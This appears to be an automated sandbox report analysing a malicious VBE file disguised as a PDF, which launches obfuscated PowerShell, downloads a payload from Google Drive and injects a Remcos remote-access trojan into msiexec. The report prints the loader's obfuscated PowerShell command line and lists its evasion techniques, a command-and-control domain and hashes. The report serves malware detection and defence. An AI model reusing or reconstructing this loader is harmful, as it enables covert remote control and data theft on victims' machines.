              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
              Source: C:\Windows\SysWOW64\msiexec.exe Thread information set: HideFromDebugger
              Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092E29A8 rdtsc 5_2_092E29A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07826DBD LdrInitializeThunk,5_2_07826DBD

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match File source: amsi64_7364.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU 
saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#subnutritious uninstructedness snigvejen sortilegi #><#diectasis rodfunktioner brdristens sangerne #>$bortfaldenes='obskniteters';function allemandes($erhvervsgeografien){if ($host.debuggerenabled) {$nickelodeons=4} for ($thimotheuss=$nickelodeons;;$thimotheuss+=5){if(!$erhvervsgeografien[$thimotheuss]) { break }$adgangskortenes55+=$erhvervsgeografien[$thimotheuss]}$adgangskortenes55}function xylotomies207($sablende){ .($douser) ($sablende)}$samandura=allemandes 'beten tjee inttrace. delwstenejustb futcbackltheoirensekagenrecat';$trolls=allemandes 'konsmdrivo lluzhvlbipicklreprl j.natold/';$tereu=allemandes 'nonatgo.ilbegosepid1 opk2';$tapeline=' kat[ guendelmeproit pro. ukosanakemon.r.eacvla,gi r.fc sumecorypcromo erikjo ntopftsicum umoaforsn orasoftgaeaceaffirspy ]endi:liga: ,vesrevleyeascmareubundrsvrniroultti byin op w nrlumbolaoct foro zenctoploc rvlbars= fer$ovartdivee reirb needen u';$trolls+=allemandes ' tub5firb.sing0rger ngle(e,shwsel ibrs.n li,dafprograywwronsopsv h,ksn.rantb dm tyr 1afko0nonf.unsp0char; kab nkuwb skithu nlose6u su4elec;svin theox nom6alge4,ice;u,ve n.nrka.evawfu:spur1e.vi3h pe1f sh.metr0 enc)afna begag greeel zcprenkgrapodekl/mine2aris0semi1.ini0tvan0 ano1fr n0 sol1alb, inf einigrnsrslove,verfpr voimbrxvisu/,ide1alla3f,is1 he .,rem0';$floristernes=allemandes ' breupulssguide pasrenso-jesta br gcus eno tnmrket';$infinitively=allemandes 'nonmharmvtbekrtspanp uerswa e:akry/soc./ vrdd otr .ucitranv serestag.satrghjeroableocensg laplexcieinte.vandcpoetosu fm ska/h teupr mc rk?overe enxdecapruntomararbro tknob=tabudse iopropwostenbar.llustorivea re dorga& geni haeddith=.lot1 rekzheadimeloystkyxc unckummjde.kudescv.egij no.9acra9tranqena tva.mxkolaqiracjpostbpianjtereafacex bihm b osregne ademu saosysi3condelondxbill9adondvapu8stanj';$chroococcoid=allemandes 
'malp>';$douser=allemandes 'girgilrebepegbx';$jakey='risting';$undepreciatory='\malodourously.dar';xylotomies207 (allemandes 'glue$beclgafbll tesovrisb inqa lazlnomi:atrob.eetri qui .ubsthinkffes=feb,$jus eelixnwoohvsvam:oppua unppran pno,mdha va ma t s naanti+af.a$ledeus ernn veddokueatomp banrv,teedadachjrui anba,hilt nnoodoserre ly');xylotomies207 (allemandes 'abat$adelgm islsuppo tarbfag,ac sml .es:husmonodum ti siu iaaarst bistcannecell=e.en$ gavicallnoverfskumiovernlapiiudb,tr ndisabbvweire an.lmissykobl. u ssslipppa,ilrasti s mt ice( s,o$ egicda khgasmrunsioop,uore,lc turo.patccoadckar.o bori ,ukdlde )');xylotomies207 (allemandes $tapeline);$infinitively=$omsatte[0];$unpositively=(allemandes ' del$eu,agu kolva eoniccb kn ahipllb yg:haarwsupeit.mmecathnsl eeretirnumiba tertanddkompscavasqua td,lonreprg pluelysnrcandnjrg e gei=impendu detit ws en-raadovanrb lo jomdmev ndcbriet ykn tecssel yrg.osfalst bonede,lm afs.auke$unchspoliatorfm tudasandnpam d flau felrlaura');xylotomies207 ($unpositively);xylotomies207 (allemandes ' t,e$boucw peri
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-8OIXMO
              Source: Yara match File source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 11 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 11 Scripting | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              [Behavior graph, ID 1559542. Sample: LSMU CITATA LT 20-11-2024#U..., start date 20/11/2024, architecture WINDOWS, score 100. Process nodes: wscript.exe starts powershell.exe, which connects to drive.google.com (172.217.19.174, port 443) and drive.usercontent.google.com (142.250.181.1, port 443); a second powershell.exe starts msiexec.exe, which carries the signatures "Detected Remcos RAT" and "Hides threads from debuggers".]

              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              gnsuw4-nsh6-mnsg.duckdns.org | 0% | Avira URL Cloud | safe |
              https://drive.usercontent.google.comseUr | 0% | Avira URL Cloud | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              drive.google.com | 172.217.19.174 | true | false | | high
              drive.usercontent.google.com | 142.250.181.1 | true | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              gnsuw4-nsh6-mnsg.duckdns.org | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1559542
                                                                Start date and time:2024-11-20 16:52:09 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 59s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:12
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:LSMU CITATA LT 20-11-2024pdf.vbe
                                                                Detection:MAL
                                                                Classification:mal100.troj.expl.evad.winVBE@9/7@2/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 60%
                                                                • Number of executed functions: 36
                                                                • Number of non-executed functions: 19
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .vbe
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target msiexec.exe, PID 8020 because there are no executed function
                                                                • Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7808 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
Time | Type | Description
10:53:13 | API Interceptor | 162x Sleep call for process: powershell.exe modified
                                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | PO 2725724312_pdf.vbs | malicious | Unknown | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | prepper-wu.ps1 | malicious | Unknown | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | SnapshotPc.ps1 | malicious | Unknown | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | Isabella County Emergency Management-protected.pdf | malicious | HTMLPhisher | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | cYDCUkIGVB.exe | malicious | Unknown | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | cYDCUkIGVB.exe | malicious | Unknown | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | KRcLFIz5PCQunB7.exe | malicious | Quasar | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | https://cipdegiphar-pharm.click/BD0C84/D0C-N0V20.html | malicious | Unknown | 142.250.181.1, 172.217.19.174
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, Stealc, Vidar | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | GST DRC-01A - DIN-20230359XL050081843E_msg.exe | malicious | GuLoader | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | Quote document and order list.exe | malicious | GuLoader | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | new order #738833.exe | malicious | GuLoader | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe | malicious | GuLoader, Snake Keylogger | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe | malicious | GuLoader, Snake Keylogger | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | BOQ and Full Specification.exe | malicious | GuLoader | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | Quote specification and BOQ.exe | malicious | GuLoader | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | Towered.vbs | malicious | FormBook, GuLoader | 142.250.181.1, 172.217.19.174
37f463bf4616ecd445d4a1937da06e19 | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 142.250.181.1, 172.217.19.174
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):11608
                                                                Entropy (8bit):4.8908305915084105
                                                                Encrypted:false
                                                                SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):459852
                                                                Entropy (8bit):5.9704762780148055
                                                                Encrypted:false
                                                                SSDEEP:12288:Cgq1XbXhhm+zyx6hdgcoqY1WM0ca2mWTAzW/jiW:CgeXbXho1xAgcoVoMba2mGAzzW
                                                                MD5:3BAF228E40AAB172AEFB503997B3EB4F
                                                                SHA1:EFB37FCF98ED3C2F9DB2CA9D49F8133122DBBD9F
                                                                SHA-256:1EF910E64AED9CB83CC2079E49863D97BAA4D8AC7551B63A5EA4000B62CA0174
                                                                SHA-512:05A2C0DCBD25A933B894A2141655E782DB003BCACE99AB617E520F37BBAC001F088048B7C0DD93CE4CD812E8CAF618D730303E517BCDDDC0989328C6BD4A59C6
                                                                Malicious:false
                                                                File type:ASCII text, with very long lines (356), with CRLF line terminators
                                                                Entropy (8bit):5.282068201676989
                                                                TrID:
                                                                  File name:LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
                                                                  File size:12'061 bytes
                                                                  MD5:df045c185b46e8c2432ea266b0671f86
                                                                  SHA1:db27134d7be95240a1349bbcd1a1dcfa0dfb3506
                                                                  SHA256:27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181
                                                                  SHA512:99306cbf23bf7a00a398849ca8ff25ce9ab1659f686e28e3e843b1a1632637495c177044173e70ad58571e2d856f4aa4e4b22b2e48e9a8cc3944feabeb4e11ae
                                                                  SSDEEP:192:1P3nxwOrFEWWm60w5HPZMy35kCktIFc/T+zxLQkQUYUu59ynvT/1dut4VXcz1Xzy:9pJEWM08HRdyCHFsaFQkQUYhivZktOMc
                                                                  TLSH:7242B65FBF1F127F51E931988BBD0F2B5954CB64C13A3C6969B93FC680C5A043628A2D
                                                                  File Content Preview:......Lactiformdemark = MidB("bastarder", 252, 252)....Set Thalamotomies = CreateObject("Shell.Application")....Set Choryos = CreateObject("Scripting.FileSystemObject")........Set Fucatious = Choryos.OpenTextFile("C:\Windows\notepad.exe", 1)......Do While
                                                                  Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-20T16:53:24.730471+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49723 | 172.217.19.174 | 443 | TCP
2024-11-20T16:53:56.419547+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49799 | 172.217.19.174 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Nov 20, 2024 16:53:29.520627022 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.520726919 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.520755053 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.530813932 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.530898094 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.530926943 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.546745062 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.546854019 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.546885967 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.555144072 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.555214882 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.555226088 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.566478014 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.566567898 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.566576958 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.576066971 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.576132059 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.576159000 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.585937023 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.586160898 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.586195946 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.595633984 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.595711946 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.595741987 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.629451036 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.629493952 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.629528046 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.629560947 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.629618883 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.633661032 CET44349729142.250.181.1192.168.2.5
